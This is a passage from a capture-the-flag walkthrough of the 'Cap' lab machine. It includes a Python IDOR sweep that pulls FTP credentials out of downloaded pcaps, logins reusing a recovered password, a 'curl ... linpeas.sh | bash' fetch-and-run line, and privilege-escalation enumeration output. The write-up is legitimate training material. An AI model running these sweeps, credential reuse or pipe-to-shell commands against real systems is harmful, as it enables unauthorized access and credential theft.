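Assumes classic pcap files (magic 0xa1b2c3d4 / 0xd4c3b2a1) with a Linux
cooked (SLL, linktype 113) or Ethernet (linktype 1) link layer.
"""
import re
import struct

PCAP_MAGIC_LE, PCAP_MAGIC_BE = 0xA1B2C3D4, 0xD4C3B2A1
LINKTYPE_ETHERNET, LINKTYPE_SLL = 1, 113
FTP_CRED = re.compile(rb"^(USER|PASS) (.+?)\r?\n", re.M)

def iter_packets(pcap):
    """Yield (linktype, frame) for each record of a classic pcap blob."""
    magic, = struct.unpack("<I", pcap[:4])
    endian = {PCAP_MAGIC_LE: "<", PCAP_MAGIC_BE: ">"}.get(magic)
    if endian is None:
        raise ValueError("not a classic pcap file")
    linktype, = struct.unpack(endian + "I", pcap[20:24])  # global header: network field
    off = 24
    while off + 16 <= len(pcap):
        incl_len = struct.unpack(endian + "IIII", pcap[off:off + 16])[2]
        off += 16
        yield linktype, pcap[off:off + incl_len]
        off += incl_len

def tcp_payload(linktype, frame):
    """Strip link, IPv4 and TCP headers; None for anything that is not IPv4/TCP."""
    if linktype == LINKTYPE_ETHERNET:
        hdr_len, ethertype = 14, struct.unpack("!H", frame[12:14])[0]
    elif linktype == LINKTYPE_SLL:
        hdr_len, ethertype = 16, struct.unpack("!H", frame[14:16])[0]
    else:
        return None
    if ethertype != 0x0800:
        return None
    ip = frame[hdr_len:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    if ip[9] != 6:  # IP protocol 6 is TCP
        return None
    tcp = ip[ihl:total_len]
    return tcp[(tcp[12] >> 4) * 4:]  # data offset is the high nibble of byte 12

def ftp_credentials(pcap):
    """Pair each USER with the PASS that follows it on the FTP control channel."""
    creds, user = [], None
    for linktype, frame in iter_packets(pcap):
        payload = tcp_payload(linktype, frame)
        if not payload:
            continue
        for cmd, arg in FTP_CRED.findall(payload):
            if cmd == b"USER":
                user = arg.decode(errors="replace")
            elif cmd == b"PASS" and user is not None:
                creds.append((user, arg.decode(errors="replace")))
                user = None
    return creds

def sweep_captures(fetch, ids):
    """IDOR sweep: fetch every capture id and keep those that leak an FTP login.
    fetch(id) returns the pcap bytes, or None when the server has no such id."""
    found = {}
    for cid in ids:
        blob = fetch(cid)
        if not blob:
            continue
        try:
            creds = ftp_credentials(blob)
        except (ValueError, struct.error, IndexError):  # error page, truncated file
            continue
        if creds:
            found[cid] = creds
    return found

def build_sample_pcap():
    """Constructed stand-in for 0.pcap: one FTP login with SLL framing. The
    USER/PASS values are the ones from the walkthrough; the framing is synthetic."""
    def record(src, dst, sport, dport, payload):
        tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 8192, 0, 0) + payload
        ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000, 64, 6, 0,
                         bytes(map(int, src.split("."))), bytes(map(int, dst.split(".")))) + tcp
        frame = struct.pack("!HHH8sH", 0, 1, 6, b"\x00\x50\x56\xb9\x60\x15\x00\x00", 0x0800) + ip
        return struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame
    header = struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, LINKTYPE_SLL)
    client, server = "192.168.196.1", "192.168.196.16"
    return header + b"".join([
        record(server, client, 21, 52000, b"220 (vsFTPd 3.0.3)\r\n"),
        record(client, server, 52000, 21, b"USER nathan\r\n"),
        record(server, client, 21, 52000, b"331 Please specify the password.\r\n"),
        record(client, server, 52000, 21, b"PASS Buck3tH4TF0RM3!\r\n"),
        record(server, client, 21, 52000, b"230 Login successful.\r\n"),
    ])

if __name__ == "__main__":
    sample = build_sample_pcap()  # offline run: id 0 "exists", every other id returns None
    print(sweep_captures(lambda cid: sample if cid == 0 else None, range(0, 10)))
```

Run it as-is to see the sweep find the credential in the constructed capture. Against the live box, replace the lambda with a function that fetches each capture through urllib.request (the download link behind the Security Snapshot button; confirm the exact path in the browser, since the page itself is served as /data/<id>) and returns None on a 404. For a single file, tshark -r 0.pcap -Y ftp remains the quicker check; the script earns its keep once there are dozens of ids to try.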
Foothold
In the second phase we log in to the services with the credential recovered above.
Start with FTP:
nopedawn@npdn ~/L/H/S/Cap> ftp 10.129.19.17
Connected to 10.129.19.17.
220 (vsFTPd 3.0.3)
Name (10.129.19.17:nopedawn): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
It worked. Let's list the files in the FTP directory:
ftp> dir
229 Entering Extended Passive Mode (|||49582|)
150 Here comes the directory listing.
-r-------- 1 1001 1001 33 Apr 07 02:17 user.txt
226 Directory send OK.
ftp> ls
229 Entering Extended Passive Mode (|||39172|)
150 Here comes the directory listing.
-r-------- 1 1001 1001 33 Apr 07 02:17 user.txt
226 Directory send OK.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||18119|)
150 Opening BINARY mode data connection for user.txt (33 bytes).
100% |*****************************************************************| 33 0.52 KiB/s 00:00 ETA
226 Transfer complete.
33 bytes received in 00:00 (0.09 KiB/s)
ftp>
nopedawn@npdn ~/L/H/S/Cap> cat user.txt
REDACTED
That's the user flag, served straight out of the FTP user's directory. Note the file is owned by UID 1001, the same UID the web service was listening as in the netstat output.
Next, the root flag.
SSH is also open, so let's try the same credential there (password reuse between FTP and SSH):
nopedawn@npdn ~/L/H/S/Cap> ssh nathan@10.129.19.17
The authenticity of host '10.129.19.17 (10.129.19.17)' can't be established.
ED25519 key fingerprint is SHA256:UDhIJpylePItP3qjtVVU+GnSyAZSr+mZKHzRoKcmLUI.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:63: [hashed name]
~/.ssh/known_hosts:65: [hashed name]
~/.ssh/known_hosts:66: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.19.17' (ED25519) to the list of known hosts.
nathan@10.129.19.17's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Apr 7 04:38:09 UTC 2026
System load: 0.0
Usage of /: 36.7% of 8.73GB
Memory usage: 21%
Swap usage: 0%
Processes: 225
Users logged in: 0
IPv4 address for eth0: 10.129.19.17
IPv6 address for eth0: dead:beef::250:56ff:feb9:6015
=> There are 2 zombie processes.
63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Thu May 27 11:21:27 2021 from 10.10.14.7
nathan@cap:~$ whoami
nathan
nathan@cap:~$ id
uid=1001(nathan) gid=1001(nathan) groups=1001(nathan)
To get the root flag we need to escalate privileges to root.
To find candidate vectors I'll run linPEAS. First, serve the script from the attacking machine with Python's built-in HTTP server; the target then fetches and executes it with a single command.
D:\HTB\Machines\Cap>python -m http.server 8481
Serving HTTP on :: port 8481 (http://[::]:8481/) ...
Back on the target, this downloads and runs the script (add -s to curl to keep its progress meter out of the linPEAS output):
curl http://10.10.17.182:8481/linpeas.sh | bash
Replace the IP with your own HTB VPN address; on Windows, ipconfig shows it under the VPN adapter:
D:\HTB\Machines\Cap>ipconfig
Windows IP Configuration
Unknown adapter Local Area Connection:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : ████:████:████::████
Link-local IPv6 Address . . . . . : ████::████:████:████:████
IPv4 Address. . . . . . . . . . . : 10.10.17.182
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . :
Now let's run it:
nathan@cap:~$ curl http://10.10.17.182:8481/linpeas.sh | bash
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
| --------------------------------------------------------------------------------- |
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @hacktricks_live |
| Respect on HTB : SirBroccoli |
| --------------------------------------------------------------------------------- |
| Thank you! |
\---------------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
23 833k 23 196k 0 0 52212 0 0:00:16 0:00:03 0:00:13 52198
╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
╚═══════════════════╝
OS: Linux version 5.4.0-80-generic (buildd@lcy01-amd64-030) (gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)) #90-Ubuntu SMP Fri Jul 9 22:49:44 UTC 2021
User & Groups: uid=1001(nathan) gid=1001(nathan) groups=1001(nathan)
Hostname: cap
Writable folder: /dev/shm
[+] /usr/bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /usr/bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
DONE. . . . . . . . . . . .
╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 5.4.0-80-generic (buildd@lcy01-amd64-030) (gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)) #90-Ubuntu SMP Fri Jul 9 22:49:44 UTC 2021
Distributor ID: Ubuntu
Description: Ubuntu 20.04.2 LTS
Release: 20.04
Codename: focal
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.31
╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
╔══════════╣ Date & uptime
Tue Apr 7 05:07:46 UTC 2026
05:07:46 up 2:51, 1 user, load average: 0.28, 0.07, 0.02
╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk
sda
sda1
sda2
sda3
sda4
╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices
/dev/disk/by-id/dm-uuid-LVM-2om9fd1B3Q2r7E8yJyxwbZF4JCSUIQCqYgbAERHfSMVI2q5K9TyUTeGzFxbyZN4a / ext4 defaults 0 0
/dev/disk/by-uuid/d3d1cf9e-20c6-450f-b152-9854f6a804ad /boot ext4 defaults 0 0
/dev/sda4 none swap sw 0 0
proc /proc proc defaults,hidepid=2 0 0
╔══════════╣ Environment
╚ Any private information inside environment variables?
SHELL=/bin/bash
HISTSIZE=0
PWD=/home/nathan
LOGNAME=nathan
XDG_SESSION_TYPE=tty
MOTD_SHOWN=pam
HOME=/home/nathan
LANG=C.UTF-8
HISTFILE=/dev/null
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
SSH_CONNECTION=10.10.17.182 53376 10.129.19.17 22
LESSCLOSE=/usr/bin/lesspipe %s %s
XDG_SESSION_CLASS=user
TERM=xterm-256color
LESSOPEN=| /usr/bin/lesspipe %s
USER=nathan
SHLVL=1
XDG_SESSION_ID=8
XDG_RUNTIME_DIR=/run/user/1001
SSH_CLIENT=10.10.17.182 53376 22
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
HISTFILESIZE=0
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1001/bus
SSH_TTY=/dev/pts/0
_=/usr/bin/env
╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-2586] nft_object UAF
Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
Exposure: probable
Tags: [ ubuntu=(20.04) ]{kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: probable
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: mint=19,[ ubuntu=18|20 ], debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: probable
Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
Details: https://seclists.org/oss-sec/2017/q1/184
Exposure: less probable
Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
═╣ AppArmor profile? .............. unconfined
═╣ is linuxONE? ................... s390x Not Found
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Seccomp enabled? ............... disabled
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (vmware)
╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════
╚═══════════╝
╔══════════╣ Container related tools present (if any):
/snap/bin/lxc
╔══════════╣ Am I Containered?
╔══════════╣ Container details
═╣ Is this a container? ........... No
═╣ Any running containers? ........ No
╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════
╚═══════╝
═╣ Google Cloud Platform? ............... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS EC2 Beanstalk? ................... No
═╣ AWS Lambda? .......................... No
═╣ AWS Codebuild? ....................... No
═╣ DO Droplet? .......................... No
═╣ Aliyun ECS? .......................... No
═╣ IBM Cloud VM? ........................ No
═╣ Azure VM? ............................ No
═╣ Azure APP? ........................... No
╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
Looks like /etc/fstab has hidepid=2, so ps will not show processes of other users
nathan 6212 0.0 0.2 7020 4912 pts/0 Ss 04:53 0:00 -bash
nathan 6583 0.0 0.5 23544 10736 pts/0 S+ 05:07 0:00 _ curl http://10.10.17.182:8481/linpeas.sh
nathan 6584 0.8 0.2 7760 5744 pts/0 S+ 05:07 0:00 _ bash
nathan 9855 0.0 0.1 7760 3912 pts/0 S+ 05:08 0:00 _ bash
nathan 9858 0.0 0.1 7648 3320 pts/0 R+ 05:08 0:00 | _ ps fauxwww
nathan 9857 0.0 0.1 7760 2520 pts/0 R+ 05:08 0:00 _ bash
nathan 9859 0.0 0.1 7760 2520 pts/0 S+ 05:08 0:00 _ bash
nathan 6127 0.0 0.4 18428 9700 ? Ss 04:53 0:00 /lib/systemd/systemd --user
nathan 9736 0.0 0.1 7108 3988 ? Ss 05:07 0:00 _ /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
╔══════════╣ Processes whose PPID belongs to a different user (not root)
╚ You will know if a user can somehow spawn processes as a different user
╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd Not Found
apache2 Not Found
sshd Not Found
╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root 1042 Feb 13 2020 /etc/crontab
/etc/cron.d:
total 20
drwxr-xr-x 2 root root 4096 Jul 31 2020 .
drwxr-xr-x 92 root root 4096 Jul 23 2021 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
-rw-r--r-- 1 root root 201 Feb 14 2020 e2scrub_all
-rw-r--r-- 1 root root 190 Jul 31 2020 popularity-contest
/etc/cron.daily:
total 48
drwxr-xr-x 2 root root 4096 May 31 2021 .
drwxr-xr-x 92 root root 4096 Jul 23 2021 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
-rwxr-xr-x 1 root root 376 Dec 4 2019 apport
-rwxr-xr-x 1 root root 1478 Apr 9 2020 apt-compat
-rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils
-rwxr-xr-x 1 root root 1187 Sep 5 2019 dpkg
-rwxr-xr-x 1 root root 377 Jan 21 2019 logrotate
-rwxr-xr-x 1 root root 1123 Feb 25 2020 man-db
-rwxr-xr-x 1 root root 4574 Jul 18 2019 popularity-contest
-rwxr-xr-x 1 root root 214 Apr 2 2020 update-notifier-common
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Jul 31 2020 .
drwxr-xr-x 92 root root 4096 Jul 23 2021 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Jul 31 2020 .
drwxr-xr-x 92 root root 4096 Jul 23 2021 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
/etc/cron.weekly:
total 20
drwxr-xr-x 2 root root 4096 May 23 2021 .
drwxr-xr-x 92 root root 4096 Jul 23 2021 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
-rwxr-xr-x 1 root root 813 Feb 25 2020 man-db
-rwxr-xr-x 1 root root 211 Apr 2 2020 update-notifier-common
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
/etc/systemd/system/multi-user.target.wants/atd.service could be executing some relative path
You can't write on systemd PATH
╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Tue 2026-04-07 06:16:54 UTC 1h 8min left Tue 2026-04-07 02:39:39 UTC 2h 28min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Tue 2026-04-07 10:36:11 UTC 5h 27min left Sun 2021-05-23 18:36:01 UTC 4 years 10 months ago fwupd-refresh.timer fwupd-refresh.service
Tue 2026-04-07 11:43:00 UTC 6h left Sun 2021-05-23 18:36:01 UTC 4 years 10 months ago apt-daily.timer apt-daily.service
Tue 2026-04-07 14:36:28 UTC 9h left Tue 2026-04-07 04:29:12 UTC 39min ago motd-news.timer motd-news.service
Tue 2026-04-07 15:11:41 UTC 10h left Tue 2026-04-07 03:09:01 UTC 1h 59min ago ua-messaging.timer ua-messaging.service
Wed 2026-04-08 00:00:00 UTC 18h left Tue 2026-04-07 02:16:55 UTC 2h 51min ago logrotate.timer logrotate.service
Wed 2026-04-08 00:00:00 UTC 18h left Tue 2026-04-07 02:16:55 UTC 2h 51min ago man-db.timer man-db.service
Wed 2026-04-08 02:31:19 UTC 21h left Tue 2026-04-07 02:31:19 UTC 2h 37min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Sun 2026-04-12 03:10:24 UTC 4 days left Tue 2026-04-07 02:17:23 UTC 2h 50min ago e2scrub_all.timer e2scrub_all.service
Mon 2026-04-13 00:00:00 UTC 5 days left Tue 2026-04-07 02:16:55 UTC 2h 51min ago fstrim.timer fstrim.service
n/a n/a n/a n/a snapd.snap-repair.timer snapd.snap-repair.service
╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request
/snap/core18/2066/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/snap/core18/2066/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/snap/core18/2066/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/snap/core18/2066/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/snap/core18/2066/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/snap/core18/2066/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/snap/core18/2066/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/snap/core18/2066/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/snap/core18/2066/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/snap/core18/2074/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/snap/core18/2074/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/snap/core18/2074/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/snap/core18/2074/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
